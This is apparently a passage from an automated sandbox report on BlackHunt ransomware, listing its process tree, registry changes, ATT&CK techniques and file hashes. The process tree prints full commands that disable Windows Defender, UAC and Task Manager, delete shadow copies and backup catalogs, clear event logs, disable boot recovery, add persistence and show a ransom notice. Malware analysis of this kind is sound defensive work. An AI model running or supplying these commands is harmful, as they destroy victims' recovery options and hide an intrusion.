wrote to memory of 2100 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 51 PID 2516 wrote to memory of 2100 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 51 PID 2516 wrote to memory of 2712 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 53 PID 2516 wrote to memory of 2712 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 53 PID 2516 wrote to memory of 2712 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 53 PID 2516 wrote to memory of 2712 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 53 PID 2516 wrote to memory of 2608 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 54 PID 2516 wrote to memory of 2608 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 54 PID 2516 wrote to memory of 2608 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 54 PID 2516 wrote to memory of 2608 2516 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe 54 PID 2140 wrote to memory of 2640 2140 cmd.exe 56 PID 2140 wrote to memory of 2640 2140 cmd.exe 56 PID 2140 wrote to memory of 2640 2140 cmd.exe 56 PID 2828 wrote to memory of 2720 2828 cmd.exe 144 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe"C:\Users\Admin\AppData\Local\Temp\7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2516 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2280 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2804
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:2760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵PID:2720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2728
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:3068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2632
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1740
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2620
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2100
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2712
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2608
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:1992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:3044
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1620
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2260
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:1180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:756
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:564
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1988
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1704
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2904
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1812
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2188
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2928
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1948
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2024
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:880
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2932
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1788
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe" /F2⤵PID:2176
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe" /F3⤵
- Creates scheduled task(s)
- Modifies registry class
PID:2760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2528
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1944
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1496
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1264
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2992
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2840 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false4⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2436
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:324
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:588
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:604
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
- Adds Run key to start application
PID:2720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1088
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
- Suspicious use of WriteProcessMemory
PID:2804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1888
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1840
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2128
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:4⤵
- Deletes NTFS Change Journal
PID:2988
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:1232
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:1676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:2788
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:2580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:2696
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:1804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:1632
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:2928
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:2888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1308
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:2272
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:2024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:2196
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:1008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:2396
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:1808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:2044
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1856
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2996
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\7d4f29346ec00b14101a0de3f0c22b88fe05a124e54b2f678ceff3d8897a69c0.exe"2⤵
- Deletes itself
PID:1764 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:2724
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:1896
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:2772
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2128
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3060
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2832
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2944
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:2840
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2016
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:1628
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:2168
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1304
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2800
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2356
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2936
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1572
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Enumerates connected drives
PID:1152
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1588
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:2708
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2032
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12KB
MD50700073e4e83fb329c326d588d1e7b8e
SHA143179430830c07ad88d92fe36bbe0f015654db2d
SHA256059640031916530c42fcc1637c35530d2fdfd021a3459c4fa01a4bffe4e4eb45
SHA5125fe33b18b84fd5fcd0e21f0ec2512f7bcdf127b11e499badfc924d27daf1b439d3512292d20ae1bcdece77784635f43e380fc7a5c22a97335eda565e5f100256
-
Filesize
684B
MD51a23bf0b1b941a62f9235839ffce9e70
SHA1aa4a3703370d76ef18306d9a626bf5f048b7b2ac
SHA256f9eea2dc754b5e509d9814aab7c701541ec69863344eef5196ec50749ed01b06
